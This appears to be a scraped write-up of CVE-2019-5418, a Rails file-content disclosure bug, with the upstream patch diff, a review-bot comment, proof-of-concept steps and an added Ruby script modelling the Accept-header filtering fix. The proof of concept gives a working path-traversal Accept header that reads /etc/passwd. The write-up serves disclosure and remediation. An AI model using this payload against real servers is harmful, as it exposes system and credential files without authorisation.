CVE-2019-5418 – File Content Disclosure on Rails
source link: https://www.tuicool.com/articles/hit/vuM7B3J
There is a possible file content disclosure vulnerability in Action View. Specially crafted Accept headers in combination with calls to `render file:` can cause arbitrary files on the target server to be rendered, disclosing the file contents.

The impact is limited to calls to `render` which render file contents without a specified accept format. Impacted code in a controller looks something like this:
Found by John Hawthorn from GitHub.
Technical Analysis:
Security Advisory:
From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001 From: John Hawthorn <[email protected]> Date: Mon, 4 Mar 2019 18:24:51 -0800 Subject: [PATCH] Only accept formats from registered mime types [CVE-2019-5418] [CVE-2019-5419] --- .../lib/action_dispatch/http/mime_negotiation.rb | 5 +++++ actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++---- .../new_base/content_negotiation_test.rb | 14 ++++++++++++-- 3 files changed, 23 insertions(+), 6 deletions(-) diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb index 498b1e669576..4e81ba12a58b 100644 --- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb +++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb @@ -79,6 +79,11 @@ def formats else [Mime[:html]] end + + v = v.select do |format| + format.symbol || format.ref == "*/*" + end + set_header k, v end end
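Review bot: the new `v.select` block keeps only entries whose `format.symbol` is set or whose `format.ref` is exactly `*/*`, which is the right gate, but nothing in the hunk says why: a one-line comment above `v = v.select do |format|` stating that unregistered media types (including path-like strings supplied through Accept) must never survive into the stored formats, and that the wildcard is kept deliberately, would make the intent obvious to future readers. The filter also runs after the `else [Mime[:html]] end` default branch, so the default passes through it too; that is harmless since `Mime[:html]` carries a symbol, but it is worth an explicit assertion in the `content_negotiation_test.rb` changes listed in the patch header so nobody "optimises" the select back above the branch.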
Proof Of Concept
- Run the vulnerable application inside the demo folder:

```
foo@bar:~$ cd demo/
foo@bar:~$ bundle install
[...]
foo@bar:~$ rails s
12:59:54 => Booting Puma
=> Rails 5.2.1 application starting in development
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
  Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
  Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)
Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
  Rendering README.md within layouts/application
  Rendered README.md within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
```

- Go to the route `/chybeta`.
- Intercept the request with Burp and replace the `Accept` header with `Accept: ../../../../../../../../../../etc/passwd{{`.
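As an added illustration that is not part of the original article and not Rails' own code, the following Ruby script models the content-negotiation step the advisory describes: it parses an Accept header into candidate formats, then contrasts passing every candidate through (the pre-fix behaviour, which lets a path-like value reach later file lookups) with keeping only registered types or the `*/*` wildcard (the approach the fix takes). The `REGISTERED_TYPES` registry, the `NegotiatedType` struct and the function names are assumptions of this example; the traversal string used as sample input is the one from the PoC above, fed in only to confirm that the filtered negotiation discards it.

```ruby
# Added example (not Rails' own code): Accept-header negotiation restricted
# to registered MIME types, modelled on the approach of the CVE-2019-5418 fix.
# The registry, struct and function names below are assumptions of this example.

# Constructed registry of "registered" formats: media type => symbol.
REGISTERED_TYPES = {
  "text/html"        => :html,
  "application/json" => :json,
  "text/plain"       => :text,
  "application/xml"  => :xml
}.freeze

# One negotiated media type. `symbol` is nil when the type is not registered.
NegotiatedType = Struct.new(:ref, :symbol, :q)

# Parse an Accept header into NegotiatedType entries, ordered by descending q
# (ties keep header order). Only the media-range token is kept; parameters
# other than q are ignored.
def parse_accept(header)
  return [] if header.nil? || header.strip.empty?

  entries = header.split(",").map do |entry|
    range, *params = entry.strip.split(";").map(&:strip)
    q = 1.0
    params.each do |param|
      key, value = param.split("=", 2)
      q = value.to_f if key == "q" && value
    end
    NegotiatedType.new(range, REGISTERED_TYPES[range], q)
  end
  entries.sort_by.with_index { |type, index| [-type.q, index] }
end

# Pre-fix behaviour: every negotiated type is passed through unchanged, so an
# unregistered, path-like value survives into later format lookups.
def formats_unfiltered(header)
  parse_accept(header)
end

# Fixed behaviour: keep only types with a registered symbol, plus the */*
# wildcard, and discard everything else before it is stored on the request.
def formats_filtered(header)
  parse_accept(header).select { |type| type.symbol || type.ref == "*/*" }
end

# Names of the formats that survive filtering, for display and for tests.
def allowed_format_names(header)
  formats_filtered(header).map { |type| type.symbol ? type.symbol.to_s : type.ref }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample headers; the last one is the PoC payload from the article.
  [
    "text/html",
    "application/json;q=0.9, */*;q=0.1",
    "../../../../../../../../../../etc/passwd{{"
  ].each do |header|
    before = formats_unfiltered(header).map(&:ref)
    after  = allowed_format_names(header)
    puts "#{header.inspect}: unfiltered=#{before.inspect} filtered=#{after.inspect}"
  end
end
```

Running the script prints, for each constructed header, the candidate list before and after filtering. The point for anyone reviewing their own negotiation code is visible in the last line of output: before the fix the path-like value is carried along as a format with no registered symbol, while after it the candidate list is empty, so nothing derived from the Accept header can reach a file lookup.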